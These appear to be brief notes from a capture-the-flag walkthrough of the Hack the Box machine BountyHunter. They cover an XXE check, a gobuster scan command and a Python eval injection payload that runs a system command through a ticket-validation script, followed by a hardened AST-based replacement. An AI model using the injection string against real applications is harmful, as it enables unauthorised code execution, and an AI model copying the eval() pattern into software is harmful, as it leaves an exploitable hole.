Hack the Box : BountyHunter

XML external entity (XXE) injection again, as in NodeBlog.

eval exploit is fun.

01:12 Check for XXE vulnerability 

XEE_Payload

01:39 gobuster for .php file

gobuster dir --url http://10.10.11.100 --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php

02:46 eval injection check

Hacking Python Applications
And how attackers exploit common programming pitfalls to gain control
cat sample.py

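# Ticket line under test; everything after the first operand is untrusted input.
x="**18+701+8+__import__('os').system('id')**"
# The first operand is the ticket code: 18 here, and 18 % 7 == 4 passes the check.
ticketCode = x.replace("**", "").split("+")[0]
if int(ticketCode) % 7 == 4:
    # eval() runs the whole expression, so the __import__ call executes `id`.
    validationNumber = eval(x.replace("**", ""))
    print(validationNumber)
    if validationNumber > 100:
        print("True")
    else:
        print("False")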
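
For comparison, a hardened version of the same check. This is an added example, not code from the box or the referenced article. It keeps the two conditions from sample.py (ticket code % 7 == 4, result > 100) but swaps eval() for a small AST walker. The names `safe_arith` and `validate_ticket`, the 64-character cap and the allowed operator set are assumptions made for illustration.

```python
import ast
import operator

# Assumption: tickets only ever need +, - and * on integer literals.
_BIN_OPS = {ast.Add: operator.add, ast.Sub: operator.sub, ast.Mult: operator.mul}
MAX_EXPR_LEN = 64  # assumed cap; bounds parse depth and integer size


def safe_arith(expr):
    """Evaluate integer arithmetic; raise ValueError on any other syntax node."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) is int:
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        # Call, Attribute, Name, Subscript, ... all end up here, unevaluated.
        raise ValueError("disallowed expression: " + type(node).__name__)
    return walk(ast.parse(expr, mode="eval"))


def validate_ticket(x):
    """Same two checks as sample.py, without handing the string to eval()."""
    expr = x.replace("**", "")
    if len(expr) > MAX_EXPR_LEN:
        return False
    try:
        if int(expr.split("+")[0]) % 7 != 4:
            return False
        return safe_arith(expr) > 100
    except (ValueError, SyntaxError):
        return False


if __name__ == "__main__":
    # Constructed inputs: a clean ticket line and the string from sample.py.
    for line in ("**18+701+8**", "**18+701+8+__import__('os').system('id')**"):
        print(line, "->", validate_ticket(line))
```

The sample.py string is rejected at the `Call` node, so nothing in it is ever executed.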